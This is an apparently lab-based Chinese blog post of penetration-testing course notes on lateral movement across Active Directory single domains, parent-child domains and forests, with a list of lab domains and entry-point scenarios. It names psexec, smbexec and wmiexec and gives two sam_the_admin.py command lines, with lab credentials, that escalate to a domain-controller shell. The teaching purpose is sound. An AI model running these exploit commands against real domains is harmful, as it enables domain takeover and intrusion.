EthanDoctor

内网对抗-横向移动篇&单域&父子域&域林&域森林&打点及信任&入口手法差异&思路方案

Ethan医生8个月前系统安全277

 横向移动-信息收集-单域&父子域&域森林

 横向移动-口令协议-单域&父子域&域森林

 横向移动-域控提权-单域&父子域&域森林

单域&父子域&域森林环境下:

1、多域信息收集差异

XDORG(xiaodi.org)

HRXRORG(hr.xiaodi.org)

HHRORG(h.hr.xiaodi.org)

GAXDORG(ga.xiaodi.org)

GGAORG(h.ga.xiaodi.org)

XIAODI8(xiaodi8.org)

 

2、口令协议横向移动差异(只要口令是对的 同网段所有的域机器都可以登入)

psexec smbexec wmiexec等

 

3、域控提权横向移动差异

python sam_the_admin.py hhrorg/'hhrpc:admin!@#45' -dc-ip 192.168.139.35 -shell

python sam_the_admin.py xdorg/'test:admin!@#45' -dc-ip 192.168.139.11 -shell

 

4、入口跳板机与打点及横向移动思路相呼应

场景1:入口机在h.hr.xiaodi.org下

场景2:入口机在hr.xiaodi.org下

场景2:入口机在xiaodi8.org下


标签: 横向移动篇
返回列表

上一篇:内网对抗-横向移动篇&域控系统提权&NetLogon&ADCS&PAC&KDC&永恒之蓝&CVE漏洞

下一篇:内网对抗-横向移动篇&工作组局域网&中间人攻击&ARP欺骗&DNS劫持&单双向&断网截获

相关文章

内网对抗-横向移动篇&Kerberos&委派安全&RBCD资源&Operators组成员&HTLMRelay结合

➢ 横向移动-资源约束委派-利用域用户主机加入➢ 横向移动-资源约束委派-Acount Operators组➢ 横向移动-资源约束委派-CVE结合HTLMRelay基于资...

内网对抗-横向移动篇&域控系统提权&NetLogon&ADCS&PAC&KDC&永恒之蓝&CVE漏洞

#横向移动-域控提权-CVE-2020-1472CVE-2020-1472是一个windows域控中最严重的远程权限提升漏洞,攻击者通过NetLogon,建立与域控间易受攻击的安全通道时,可利用此漏洞...

内网对抗-信息收集篇&自动项目&本机导出&外部打点&域内通讯&Pillager&BloodHound

➢ 信息收集-工具项目-本机-Searchall&Pillager➢ 信息收集-工具项目-打点-FScan&Template➢ 信息收集-工具项目-综合-...

Windows系统权限提升篇&AD内网域控&NetLogon&ADCS&PAC&KDC&CVE漏洞

➢ WIN-AD域控提权-CVE-2014-6324➢ WIN-AD域控提权-CVE-2020-1472➢ WIN-AD域控提权-CVE-2021-42287➢ ...

内网对抗-实战项目&VPC1打靶&PHP-RCE&三层代理路由&防火墙上线&密码喷射&域控提权

内网对抗-实战项目&VPC1打靶&PHP-RCE&三层代理路由&防火墙上线&密码喷射&域控提权

➢ 实战项目-VPC1-打靶WP1、php最新rcePOST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allo...

Windows&Linux&远程探针&本地自检&任意执行&权限提升&入口点

工具在外网顶多做个信息搜集,主要使用在内网#远程执行漏洞自检(代码执行等) Nessus号称是世界上最流行的漏洞扫描程序,全世界有超过75000个组织在使用它。该工具提供完整的电脑漏洞扫描服...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号